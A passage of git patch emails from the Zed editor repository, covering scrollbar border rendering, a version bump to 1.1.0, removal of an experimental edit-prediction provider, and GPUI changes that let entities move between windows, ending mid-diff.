@@ -1256,7 +1330,7 @@ impl Element for ScrollbarElement { cursor_hitbox, axis, reserved_space, - track_background, + track_config, .. } in &prepaint_state.thumbs { @@ -1271,12 +1345,14 @@ impl Element for ScrollbarElement { _ => (colors.scrollbar_thumb_background, false), }; + let blend_color = track_config + .as_ref() + .map(|(_, colors)| colors.background) + .unwrap_or(colors.surface_background); + let blending_color = if hovered || reserved_space.needs_scroll_track() { - track_background - .map(|(_, background)| background) - .unwrap_or(colors.surface_background) + blend_color } else { - let blend_color = colors.surface_background; blend_color.min(blend_color.alpha(MAXIMUM_OPACITY)) }; @@ -1286,25 +1362,52 @@ impl Element for ScrollbarElement { thumb_color.fade_out(fade); } - if let Some((track_bounds, color)) = track_background { - let mut color = *color; - if let Some(fade) = autohide_fade { - color.fade_out(fade); + if let Some((track_bounds, colors)) = track_config { + let has_border = colors.has_border; + + let mut track_color = colors.background; + if let Some(fade) = autohide_fade + && !has_border + { + track_color.fade_out(fade); } + let border_edges = has_border + .then(|| match axis { + ScrollbarAxis::Horizontal => Edges { + top: BORDER_WIDTH, + ..Default::default() + }, + ScrollbarAxis::Vertical => Edges { + left: BORDER_WIDTH, + ..Default::default() + }, + }) + .unwrap_or_default(); + + let border_color = if has_border { + cx.theme().colors().border_variant.opacity(0.6) + } else { + Hsla::transparent_black() + }; + window.paint_quad(quad( *track_bounds, Corners::default(), - color, - Edges::default(), - Hsla::transparent_black(), - BorderStyle::default(), + track_color, + border_edges, + border_color, + BorderStyle::Solid, )); } window.paint_quad(quad( *thumb_bounds, - Corners::all(Pixels::MAX).clamp_radii_for_quad_size(thumb_bounds.size), + match style { + ScrollbarStyle::Regular => Corners::all(Pixels::MAX) + .clamp_radii_for_quad_size(thumb_bounds.size), + ScrollbarStyle::Editor => Corners::default(), + }, thumb_color, Edges::default(), Hsla::transparent_black(), From 4a13c244eb4f52a5f49d9416b92b52898c0c1eb3 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Mon, 27 Apr 2026 18:22:46 -0400 Subject: [PATCH 066/231] Bump Zed to v1.1.0 (#55035) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- Cargo.lock | 2 +- crates/zed/Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 0149c9e199e408..2457f314e32ab6 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -22390,7 +22390,7 @@ dependencies = [ [[package]] name = "zed" -version = "0.235.0" +version = "1.1.0" dependencies = [ "acp_thread", "acp_tools", diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index f66b6746696947..b77125796ab3ec 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -2,7 +2,7 @@ description = "The fast, collaborative code editor." edition.workspace = true name = "zed" -version = "0.235.0" +version = "1.1.0" publish.workspace = true license = "GPL-3.0-or-later" authors = ["Zed Team "] From f7de7eccc196059c5a20a1a3083ee90ebf4465c7 Mon Sep 17 00:00:00 2001 From: Ben Kunkle Date: Tue, 28 Apr 2026 02:41:38 -0500 Subject: [PATCH 067/231] ep: Remove old experimental provider (#55011) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A or Added/Fixed/Improved ... --- crates/agent_ui/src/agent_ui.rs | 3 +- crates/edit_prediction/src/edit_prediction.rs | 7 +-- .../src/edit_prediction_button.rs | 11 +--- .../src/migrations/m_2026_02_03/settings.rs | 13 ++++- crates/migrator/src/migrator.rs | 11 +++- crates/settings_content/src/language.rs | 55 ++----------------- .../zed/src/zed/edit_prediction_registry.rs | 1 - 7 files changed, 32 insertions(+), 69 deletions(-) diff --git a/crates/agent_ui/src/agent_ui.rs b/crates/agent_ui/src/agent_ui.rs index 4e37911f29497e..449194a738070f 100644 --- a/crates/agent_ui/src/agent_ui.rs +++ b/crates/agent_ui/src/agent_ui.rs @@ -585,8 +585,7 @@ fn update_command_palette_filter(cx: &mut App) { | EditPredictionProvider::Codestral | EditPredictionProvider::Ollama | EditPredictionProvider::OpenAiCompatibleApi - | EditPredictionProvider::Mercury - | EditPredictionProvider::Experimental(_) => { + | EditPredictionProvider::Mercury => { filter.show_namespace("edit_prediction"); filter.hide_namespace("copilot"); filter.show_action_types(edit_prediction_actions.iter()); diff --git a/crates/edit_prediction/src/edit_prediction.rs b/crates/edit_prediction/src/edit_prediction.rs index f43b94212c0699..824c45036b7fcc 100644 --- a/crates/edit_prediction/src/edit_prediction.rs +++ b/crates/edit_prediction/src/edit_prediction.rs @@ -2109,8 +2109,7 @@ fn is_ep_store_provider(provider: EditPredictionProvider) -> bool { EditPredictionProvider::Zed | EditPredictionProvider::Mercury | EditPredictionProvider::Ollama - | EditPredictionProvider::OpenAiCompatibleApi - | EditPredictionProvider::Experimental(_) => true, + | EditPredictionProvider::OpenAiCompatibleApi => true, EditPredictionProvider::None | EditPredictionProvider::Copilot | EditPredictionProvider::Codestral => false, @@ -2145,9 +2144,7 @@ impl EditPredictionStore { let (needs_acceptance_tracking, max_pending_predictions) = match all_language_settings(None, cx).edit_predictions.provider { - EditPredictionProvider::Zed - | EditPredictionProvider::Mercury - | EditPredictionProvider::Experimental(_) => (true, 2), + EditPredictionProvider::Zed | EditPredictionProvider::Mercury => (true, 2), EditPredictionProvider::Ollama => (false, 1), EditPredictionProvider::OpenAiCompatibleApi => (false, 2), EditPredictionProvider::None diff --git a/crates/edit_prediction_ui/src/edit_prediction_button.rs b/crates/edit_prediction_ui/src/edit_prediction_button.rs index f80680d4e59dd0..d8e52fe8a7bb40 100644 --- a/crates/edit_prediction_ui/src/edit_prediction_button.rs +++ b/crates/edit_prediction_ui/src/edit_prediction_button.rs @@ -323,15 +323,12 @@ impl Render for EditPredictionButton { .with_handle(self.popover_menu_handle.clone()), ) } - provider @ (EditPredictionProvider::Experimental(_) - | EditPredictionProvider::Zed - | EditPredictionProvider::Mercury) => { + provider @ (EditPredictionProvider::Zed | EditPredictionProvider::Mercury) => { let enabled = self.editor_enabled.unwrap_or(true); let file = self.file.clone(); let language = self.language.clone(); let project = self.project.clone(); let provider_name: &'static str = match provider { - EditPredictionProvider::Experimental(name) => name, EditPredictionProvider::Zed => "zed", _ => "unknown", }; @@ -428,10 +425,8 @@ impl Render for EditPredictionButton { None }; - let zed_cloud_needs_sign_in = matches!( - provider, - EditPredictionProvider::Zed | EditPredictionProvider::Experimental(_) - ) && user.is_none(); + let zed_cloud_needs_sign_in = + matches!(provider, EditPredictionProvider::Zed) && user.is_none(); let provider_unavailable = missing_token || mercury_has_error || zed_cloud_needs_sign_in; diff --git a/crates/migrator/src/migrations/m_2026_02_03/settings.rs b/crates/migrator/src/migrations/m_2026_02_03/settings.rs index 6280d9370d9ff5..b3de3031be9e6d 100644 --- a/crates/migrator/src/migrations/m_2026_02_03/settings.rs +++ b/crates/migrator/src/migrations/m_2026_02_03/settings.rs @@ -41,7 +41,14 @@ fn migrate_provider_field(obj: &mut serde_json::Map, field_name: return; }; - if name == "sweep" || name == "mercury" { - obj.insert(field_name.to_string(), Value::String(name.to_string())); - } + let provider_name = match name { + "sweep" | "mercury" => name, + "zeta2" => "zed", + _ => return, + }; + + obj.insert( + field_name.to_string(), + Value::String(provider_name.to_string()), + ); } diff --git a/crates/migrator/src/migrator.rs b/crates/migrator/src/migrator.rs index 72cd7723ce69d5..ac7e4e337ed946 100644 --- a/crates/migrator/src/migrator.rs +++ b/crates/migrator/src/migrator.rs @@ -3199,7 +3199,16 @@ mod tests { } "# .unindent(), - None, + Some( + &r#" + { + "edit_predictions": { + "provider": "zed" + } + } + "# + .unindent(), + ), ); // Platform key: settings nested inside "linux" should be migrated diff --git a/crates/settings_content/src/language.rs b/crates/settings_content/src/language.rs index b9accd6b83d6df..d3f0e6a4195bae 100644 --- a/crates/settings_content/src/language.rs +++ b/crates/settings_content/src/language.rs @@ -2,7 +2,7 @@ use std::{num::NonZeroU32, path::Path}; use collections::{HashMap, HashSet}; use schemars::JsonSchema; -use serde::{Deserialize, Serialize, de::Error as _}; +use serde::{Deserialize, Serialize}; use settings_macros::{MergeFrom, with_fallible_options}; use std::sync::Arc; @@ -75,7 +75,9 @@ impl merge_from::MergeFrom for AllLanguageSettingsContent { } /// The provider that supplies edit predictions. -#[derive(Copy, Clone, Debug, Default, Eq, PartialEq, Serialize, JsonSchema, MergeFrom)] +#[derive( + Copy, Clone, Debug, Default, Eq, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom, +)] #[serde(rename_all = "snake_case")] pub enum EditPredictionProvider { None, @@ -86,50 +88,6 @@ pub enum EditPredictionProvider { Ollama, OpenAiCompatibleApi, Mercury, - Experimental(&'static str), -} - -const EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME: &str = "zeta2"; - -impl<'de> Deserialize<'de> for EditPredictionProvider { - fn deserialize(deserializer: D) -> Result - where - D: serde::Deserializer<'de>, - { - #[derive(Deserialize)] - #[serde(rename_all = "snake_case")] - pub enum Content { - None, - Copilot, - Zed, - Codestral, - Ollama, - OpenAiCompatibleApi, - Mercury, - Experimental(String), - } - - Ok(match Content::deserialize(deserializer)? { - Content::None => EditPredictionProvider::None, - Content::Copilot => EditPredictionProvider::Copilot, - Content::Zed => EditPredictionProvider::Zed, - Content::Codestral => EditPredictionProvider::Codestral, - Content::Ollama => EditPredictionProvider::Ollama, - Content::OpenAiCompatibleApi => EditPredictionProvider::OpenAiCompatibleApi, - Content::Mercury => EditPredictionProvider::Mercury, - Content::Experimental(name) - if name == EXPERIMENTAL_ZETA2_EDIT_PREDICTION_PROVIDER_NAME => - { - EditPredictionProvider::Zed - } - Content::Experimental(name) => { - return Err(D::Error::custom(format!( - "Unknown experimental edit prediction provider: {}", - name - ))); - } - }) - } } impl EditPredictionProvider { @@ -141,8 +99,7 @@ impl EditPredictionProvider { | EditPredictionProvider::Codestral | EditPredictionProvider::Ollama | EditPredictionProvider::OpenAiCompatibleApi - | EditPredictionProvider::Mercury - | EditPredictionProvider::Experimental(_) => false, + | EditPredictionProvider::Mercury => false, } } @@ -152,7 +109,7 @@ impl EditPredictionProvider { EditPredictionProvider::Copilot => Some("GitHub Copilot"), EditPredictionProvider::Codestral => Some("Codestral"), EditPredictionProvider::Mercury => Some("Mercury"), - EditPredictionProvider::Experimental(_) | EditPredictionProvider::None => None, + EditPredictionProvider::None => None, EditPredictionProvider::Ollama => Some("Ollama"), EditPredictionProvider::OpenAiCompatibleApi => Some("OpenAI-Compatible API"), } diff --git a/crates/zed/src/zed/edit_prediction_registry.rs b/crates/zed/src/zed/edit_prediction_registry.rs index ad394cc5e760b6..5e41024589df1b 100644 --- a/crates/zed/src/zed/edit_prediction_registry.rs +++ b/crates/zed/src/zed/edit_prediction_registry.rs @@ -147,7 +147,6 @@ fn edit_prediction_provider_config_for_settings(cx: &App) -> Option Some(EditPredictionProviderConfig::Zed( EditPredictionModel::Mercury, )), - EditPredictionProvider::Experimental(_) => None, } } From 6d6419fb3fdb434181924063b6049551db581cc2 Mon Sep 17 00:00:00 2001 From: Mikayla Maki Date: Tue, 28 Apr 2026 10:04:42 +0200 Subject: [PATCH 068/231] Query for window instead of capturing (#55059) This allows us to move entities between windows without breaking all the callbacks. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/gpui/Cargo.toml | 4 + .../examples/move_entity_between_windows.rs | 154 ++++++++++++++++++ crates/gpui/src/app.rs | 74 ++++++++- crates/gpui/src/app/async_context.rs | 49 +++++- crates/gpui/src/app/context.rs | 74 +++++---- crates/gpui/src/app/entity_map.rs | 9 +- crates/gpui/src/app/headless_app_context.rs | 11 +- crates/gpui/src/app/test_context.rs | 50 ++++-- crates/gpui/src/app/visual_test_context.rs | 17 +- crates/gpui/src/gpui.rs | 10 ++ crates/gpui_macros/src/derive_app_context.rs | 9 + crates/sidebar/src/sidebar_tests.rs | 2 +- 12 files changed, 392 insertions(+), 71 deletions(-) create mode 100644 crates/gpui/examples/move_entity_between_windows.rs diff --git a/crates/gpui/Cargo.toml b/crates/gpui/Cargo.toml index 9b1d4562deabde..38a8c6134d1aa4 100644 --- a/crates/gpui/Cargo.toml +++ b/crates/gpui/Cargo.toml @@ -180,6 +180,10 @@ naga.workspace = true name = "hello_world" path = "examples/hello_world.rs" +[[example]] +name = "move_entity_between_windows" +path = "examples/move_entity_between_windows.rs" + [[example]] name = "image" path = "examples/image/image.rs" diff --git a/crates/gpui/examples/move_entity_between_windows.rs b/crates/gpui/examples/move_entity_between_windows.rs new file mode 100644 index 00000000000000..6ad3c8fab0c0f3 --- /dev/null +++ b/crates/gpui/examples/move_entity_between_windows.rs @@ -0,0 +1,154 @@ +//! An entity registers callbacks via the `_in` API family and then gets +//! re-hosted in a new window via a click. The point of the example is to +//! demonstrate that callbacks dispatched after the move correctly target the +//! entity's *current* window rather than the window it was in at +//! registration time. +//! +//! To run: cargo run -p gpui --example move_entity_between_windows + +#![cfg_attr(target_family = "wasm", no_main)] + +use std::time::Duration; + +use gpui::{ + App, AppContext as _, Bounds, Context, EventEmitter, MouseButton, Render, SharedString, + Subscription, Task, Window, WindowBounds, WindowOptions, div, prelude::*, px, rgb, size, +}; +use gpui_platform::application; + +struct MoveToNewWindow; + +struct HelloWorld { + text: SharedString, + tick_count: u32, + move_count: u32, + _tasks: Vec>, + _subscriptions: Vec, +} + +impl EventEmitter for HelloWorld {} + +impl HelloWorld { + fn new(window: &mut Window, cx: &mut Context) -> Self { + let self_entity = cx.entity(); + + let task = cx.spawn_in(window, async move |this, cx| { + loop { + cx.background_executor().timer(Duration::from_secs(1)).await; + let result = this.update_in(cx, |this, window, _cx| { + this.tick_count += 1; + println!( + "tick #{} fired in entity's current window {}", + this.tick_count, + window.window_handle().window_id().as_u64(), + ); + }); + if let Err(err) = result { + println!("tick task giving up: {err}"); + return; + } + } + }); + + let subscription = cx.subscribe_in::<_, MoveToNewWindow>( + &self_entity, + window, + move |this, _emitter, _event, window, cx| { + let entered_window_id = window.window_handle().window_id().as_u64(); + println!( + "MoveToNewWindow handler fired in entity's current window {entered_window_id}", + ); + + this.move_count += 1; + cx.notify(); + + let entity = cx.entity(); + let old_window = window.window_handle(); + cx.defer(move |cx| { + let bounds = Bounds::centered(None, size(px(500.0), px(500.0)), cx); + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + ..Default::default() + }, + move |_, _| entity, + ) + .expect("failed to open new window"); + old_window + .update(cx, |_, window, _| window.remove_window()) + .ok(); + }); + }, + ); + + Self { + text: "World".into(), + tick_count: 0, + move_count: 0, + _tasks: vec![task], + _subscriptions: vec![subscription], + } + } +} + +impl Render for HelloWorld { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let window_id = window.window_handle().window_id().as_u64(); + + div() + .flex() + .flex_col() + .gap_3() + .bg(rgb(0x505050)) + .size(px(500.0)) + .justify_center() + .items_center() + .text_xl() + .text_color(rgb(0xffffff)) + .child(format!("Hello, {}!", &self.text)) + .child(format!("Rendering in window: {window_id}")) + .child(format!("Ticks observed by entity: {}", self.tick_count)) + .child(format!("Moves observed by entity: {}", self.move_count)) + .child( + div() + .px_4() + .py_2() + .bg(rgb(0x4040ff)) + .rounded_md() + .child("Move me to a new window") + .on_mouse_down( + MouseButton::Left, + cx.listener(|_this, _, _window, cx| { + cx.emit(MoveToNewWindow); + }), + ), + ) + } +} + +fn run_example() { + application().run(|cx: &mut App| { + let bounds = Bounds::centered(None, size(px(500.0), px(500.0)), cx); + cx.open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(bounds)), + ..Default::default() + }, + |window, cx| cx.new(|cx| HelloWorld::new(window, cx)), + ) + .unwrap(); + cx.activate(true); + }); +} + +#[cfg(not(target_family = "wasm"))] +fn main() { + run_example(); +} + +#[cfg(target_family = "wasm")] +#[wasm_bindgen::prelude::wasm_bindgen(start)] +pub fn start() { + gpui_platform::web_init(); + run_example(); +} diff --git a/crates/gpui/src/app.rs b/crates/gpui/src/app.rs index 3642d46a3325fd..f19c780caa671d 100644 --- a/crates/gpui/src/app.rs +++ b/crates/gpui/src/app.rs @@ -638,6 +638,7 @@ pub struct App { pub(crate) window_invalidators_by_entity: FxHashMap>, pub(crate) tracked_entities: FxHashMap>, + pub(crate) current_window_by_entity: FxHashMap, #[cfg(any(feature = "inspector", debug_assertions))] pub(crate) inspector_renderer: Option, #[cfg(any(feature = "inspector", debug_assertions))] @@ -715,6 +716,7 @@ impl App { observers: SubscriberSet::new(), tracked_entities: FxHashMap::default(), window_invalidators_by_entity: FxHashMap::default(), + current_window_by_entity: FxHashMap::default(), event_listeners: SubscriberSet::new(), release_listeners: SubscriberSet::new(), keystroke_observers: SubscriberSet::new(), @@ -952,6 +954,8 @@ impl App { .entry(*entity) .or_default() .insert(window_handle.id, invalidator.clone()); + self.current_window_by_entity + .insert(*entity, window_handle.id); } tracked_entities.clear(); tracked_entities.extend(entities.iter().copied()); @@ -1458,6 +1462,8 @@ impl App { for (entity_id, mut entity) in dropped { self.observers.remove(&entity_id); self.event_listeners.remove(&entity_id); + self.window_invalidators_by_entity.remove(&entity_id); + self.current_window_by_entity.remove(&entity_id); for release_callback in self.release_listeners.remove(&entity_id) { release_callback(entity.as_mut(), self); } @@ -1534,6 +1540,13 @@ impl App { tid: TypeId, window: Option, ) { + // Seed the entity's current window from its creation context so + // `with_window` resolves correctly before the entity has ever been + // rendered. + if let Some(id) = window { + self.current_window_by_entity.insert(entity.entity_id(), id); + } + self.new_entity_observers.clone().retain(&tid, |observer| { if let Some(id) = window { self.update_window_id(id, { @@ -1548,7 +1561,28 @@ impl App { }); } - fn update_window_id(&mut self, id: WindowId, update: F) -> Result + /// Run `f` against the entity's *current* window — the most recently + /// rendered window that referenced the entity, or its creation window if + /// it has yet to be rendered. Returns `None` if the entity has no + /// current window, or if that window has been closed, or if it is + /// already on the update stack. + pub fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + let window_id = *self.current_window_by_entity.get(&entity_id)?; + self.update_window_id(window_id, |_, window, cx| f(window, cx)) + .ok() + } + + fn ensure_window(&mut self, entity_id: EntityId, window: WindowId) { + self.current_window_by_entity + .entry(entity_id) + .or_insert(window); + } + + pub(crate) fn update_window_id(&mut self, id: WindowId, update: F) -> Result where F: FnOnce(AnyView, &mut Window, &mut App) -> T, { @@ -1565,6 +1599,18 @@ impl App { if window.removed { cx.window_handles.remove(&id); cx.windows.remove(id); + if let Some(tracked) = cx.tracked_entities.remove(&id) { + for entity_id in tracked { + if let Some(windows) = + cx.window_invalidators_by_entity.get_mut(&entity_id) + { + windows.remove(&id); + } + if cx.current_window_by_entity.get(&entity_id) == Some(&id) { + cx.current_window_by_entity.remove(&entity_id); + } + } + } cx.window_closed_observers.clone().retain(&(), |callback| { callback(cx, id); @@ -2281,13 +2327,27 @@ impl App { .or_default(), ); - if window_invalidators.is_empty() { + // `window_invalidators_by_entity` is monotonic, so an entry alone + // doesn't mean the window is currently rendering the entity. Filter + // through `tracked_entities` to keep invalidation tight to windows + // that actually display this entity right now. + let live_invalidators: SmallVec<[WindowInvalidator; 2]> = window_invalidators + .iter() + .filter(|(window_id, _)| { + self.tracked_entities + .get(window_id) + .is_some_and(|set| set.contains(&entity_id)) + }) + .map(|(_, invalidator)| invalidator.clone()) + .collect(); + + if live_invalidators.is_empty() { if self.pending_notifications.insert(entity_id) { self.pending_effects .push_back(Effect::Notify { emitter: entity_id }); } } else { - for invalidator in window_invalidators.values() { + for invalidator in &live_invalidators { invalidator.invalidate_view(entity_id, self); } } @@ -2423,6 +2483,14 @@ impl AppContext for App { self.update_window_id(handle.id, update) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + App::with_window(self, entity_id, f) + } + fn read_window( &self, window: &WindowHandle, diff --git a/crates/gpui/src/app/async_context.rs b/crates/gpui/src/app/async_context.rs index e2fd203c78364a..be917764f4366b 100644 --- a/crates/gpui/src/app/async_context.rs +++ b/crates/gpui/src/app/async_context.rs @@ -1,8 +1,8 @@ use crate::{ AnyView, AnyWindowHandle, App, AppCell, AppContext, BackgroundExecutor, BorrowAppContext, - Entity, EventEmitter, Focusable, ForegroundExecutor, Global, GpuiBorrow, PromptButton, - PromptLevel, Render, Reservation, Result, Subscription, Task, VisualContext, Window, - WindowHandle, + Entity, EntityId, EventEmitter, Focusable, ForegroundExecutor, Global, GpuiBorrow, + PromptButton, PromptLevel, Render, Reservation, Result, Subscription, Task, VisualContext, + Window, WindowHandle, }; use anyhow::{Context as _, bail}; use derive_more::{Deref, DerefMut}; @@ -94,6 +94,19 @@ impl AppContext for AsyncApp { lock.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + let app = self.app.upgrade()?; + let mut lock = app.try_borrow_mut().ok()?; + if lock.quitting { + return None; + } + lock.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, @@ -365,7 +378,12 @@ impl AppContext for AsyncWindowContext { where T: 'static, { - self.app.new(build_entity) + // Associate the new entity with our captured window so that + // `with_window` can resolve a dispatch target before the entity has + // been rendered. + self.app + .update_window(self.window, |_, _, cx| cx.new(build_entity)) + .expect("window was unexpectedly closed") } fn reserve_entity(&mut self) -> Reservation { @@ -377,7 +395,11 @@ impl AppContext for AsyncWindowContext { reservation: Reservation, build_entity: impl FnOnce(&mut Context) -> T, ) -> Entity { - self.app.insert_entity(reservation, build_entity) + self.app + .update_window(self.window, |_, _, cx| { + cx.insert_entity(reservation, build_entity) + }) + .expect("window was unexpectedly closed") } fn update_entity( @@ -409,6 +431,14 @@ impl AppContext for AsyncWindowContext { self.app.update_window(window, update) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + self.app.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, @@ -457,9 +487,12 @@ impl VisualContext for AsyncWindowContext { view: &Entity, update: impl FnOnce(&mut T, &mut Window, &mut Context) -> R, ) -> Result { - self.app.update_window(self.window, |_, window, cx| { - view.update(cx, |entity, cx| update(entity, window, cx)) - }) + let view = view.clone(); + self.app + .with_window(view.entity_id(), |window, app| { + view.update(app, |entity, cx| update(entity, window, cx)) + }) + .context("entity has no current window") } fn replace_root_view( diff --git a/crates/gpui/src/app/context.rs b/crates/gpui/src/app/context.rs index c2c74a0d57c8f0..0d1ee47ce436e8 100644 --- a/crates/gpui/src/app/context.rs +++ b/crates/gpui/src/app/context.rs @@ -307,9 +307,13 @@ impl<'a, T: 'static> Context<'a, T> { window: &Window, f: impl FnOnce(&mut T, &mut Window, &mut Context) + 'static, ) { - let view = self.entity(); - window.defer(self, move |window, cx| { - view.update(cx, |view, cx| f(view, window, cx)) + let view = self.weak_entity(); + let entity_id = self.entity_id(); + self.ensure_window(entity_id, window.handle.id); + self.app.defer(move |cx| { + cx.with_window(entity_id, |window, cx| { + view.update(cx, |view, cx| f(view, window, cx)).ok(); + }); }); } @@ -326,25 +330,21 @@ impl<'a, T: 'static> Context<'a, T> { { let observed_id = observed.entity_id(); let observed = observed.downgrade(); - let window_handle = window.handle; let observer = self.weak_entity(); + let observer_id = self.entity_id(); + self.ensure_window(observer_id, window.handle.id); self.new_observer( observed_id, Box::new(move |cx| { - window_handle - .update(cx, |_, window, cx| { - if let Some((observer, observed)) = - observer.upgrade().zip(observed.upgrade()) - { - observer.update(cx, |observer, cx| { - on_notify(observer, observed, window, cx); - }); - true - } else { - false - } - }) - .unwrap_or(false) + let Some((observer, observed)) = observer.upgrade().zip(observed.upgrade()) else { + return false; + }; + cx.with_window(observer_id, |window, cx| { + observer.update(cx, |observer, cx| { + on_notify(observer, observed, window, cx); + }); + }); + true }), ) } @@ -363,28 +363,25 @@ impl<'a, T: 'static> Context<'a, T> { Evt: 'static, { let emitter = emitter.downgrade(); - let window_handle = window.handle; let subscriber = self.weak_entity(); + let subscriber_id = self.entity_id(); + self.ensure_window(subscriber_id, window.handle.id); self.new_subscription( emitter.entity_id(), ( TypeId::of::(), Box::new(move |event, cx| { - window_handle - .update(cx, |_, window, cx| { - if let Some((subscriber, emitter)) = - subscriber.upgrade().zip(emitter.upgrade()) - { - let event = event.downcast_ref().expect("invalid event type"); - subscriber.update(cx, |subscriber, cx| { - on_event(subscriber, &emitter, event, window, cx); - }); - true - } else { - false - } - }) - .unwrap_or(false) + let Some((subscriber, emitter)) = subscriber.upgrade().zip(emitter.upgrade()) + else { + return false; + }; + let event = event.downcast_ref().expect("invalid event type"); + cx.with_window(subscriber_id, |window, cx| { + subscriber.update(cx, |subscriber, cx| { + on_event(subscriber, &emitter, event, window, cx); + }); + }); + true }), ), ) @@ -835,6 +832,15 @@ impl AppContext for Context<'_, T> { self.app.update_window(window, update) } + #[inline] + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + self.app.with_window(entity_id, f) + } + #[inline] fn read_window( &self, diff --git a/crates/gpui/src/app/entity_map.rs b/crates/gpui/src/app/entity_map.rs index cc4eaee4926188..e4e9f3b58a5f73 100644 --- a/crates/gpui/src/app/entity_map.rs +++ b/crates/gpui/src/app/entity_map.rs @@ -795,14 +795,13 @@ impl WeakEntity { update: impl FnOnce(&mut T, &mut Window, &mut Context) -> R, ) -> Result where - C: VisualContext, + C: AppContext, { - let window = cx.window_handle(); let entity = self.upgrade().context("entity released")?; - - window.update(cx, |_, window, cx| { - entity.update(cx, |entity, cx| update(entity, window, cx)) + cx.with_window(entity.entity_id(), |window, app| { + entity.update(app, |entity, cx| update(entity, window, cx)) }) + .context("entity has no current window") } /// Reads the entity referenced by this handle with the given function if diff --git a/crates/gpui/src/app/headless_app_context.rs b/crates/gpui/src/app/headless_app_context.rs index 90dc8c8f0c0994..b21e64fa369b5c 100644 --- a/crates/gpui/src/app/headless_app_context.rs +++ b/crates/gpui/src/app/headless_app_context.rs @@ -10,7 +10,7 @@ use crate::{ AnyView, AnyWindowHandle, App, AppCell, AppContext, AssetSource, BackgroundExecutor, Bounds, - Context, Entity, ForegroundExecutor, Global, Pixels, PlatformHeadlessRenderer, + Context, Entity, EntityId, ForegroundExecutor, Global, Pixels, PlatformHeadlessRenderer, PlatformTextSystem, Render, Reservation, Size, Task, TestDispatcher, TestPlatform, TextSystem, Window, WindowBounds, WindowHandle, WindowOptions, app::{GpuiBorrow, GpuiMode}, @@ -246,6 +246,15 @@ impl AppContext for HeadlessAppContext { lock.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + let mut lock = self.app.borrow_mut(); + lock.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, diff --git a/crates/gpui/src/app/test_context.rs b/crates/gpui/src/app/test_context.rs index 99a64b54e2fee1..8a6d7e3f840d05 100644 --- a/crates/gpui/src/app/test_context.rs +++ b/crates/gpui/src/app/test_context.rs @@ -1,9 +1,9 @@ use crate::{ Action, AnyView, AnyWindowHandle, App, AppCell, AppContext, AsyncApp, AvailableSpace, BackgroundExecutor, BorrowAppContext, Bounds, Capslock, ClipboardItem, DrawPhase, Drawable, - Element, Empty, EventEmitter, ForegroundExecutor, Global, InputEvent, Keystroke, Modifiers, - ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, - Platform, Point, Render, Result, Size, Task, TestDispatcher, TestPlatform, + Element, Empty, EntityId, EventEmitter, ForegroundExecutor, Global, InputEvent, Keystroke, + Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, + Pixels, Platform, Point, Render, Result, Size, Task, TestDispatcher, TestPlatform, TestScreenCaptureSource, TestWindow, TextSystem, VisualContext, Window, WindowBounds, WindowHandle, WindowOptions, app::GpuiMode, window::ElementArenaScope, }; @@ -84,6 +84,15 @@ impl AppContext for TestAppContext { lock.update_window(window, f) } + fn with_window( + &mut self, + entity_id: EntityId, + f: impl FnOnce(&mut Window, &mut App) -> R, + ) -> Option { + let mut lock = self.app.borrow_mut(); + lock.with_window(entity_id, f) + } + fn read_window( &self, window: &WindowHandle, @@ -193,12 +202,6 @@ impl TestAppContext { &self.foreground_executor } - #[expect(clippy::wrong_self_convention)] - fn new(&mut self, build_entity: impl FnOnce(&mut Context) -> T) -> Entity { - let mut cx = self.app.borrow_mut(); - cx.new(build_entity) - } - /// Gives you an `&mut App` for the duration of the closure pub fn update(&self, f: impl FnOnce(&mut App) -> R) -> R { let mut cx = self.app.borrow_mut(); @@ -940,7 +943,9 @@ impl VisualTestContext { impl AppContext for VisualTestContext { fn new(&mut self, build_entity: impl FnOnce(&mut Context) -> T) -> Entity { - self.cx.new(build_entity) + self.window + .update(&mut 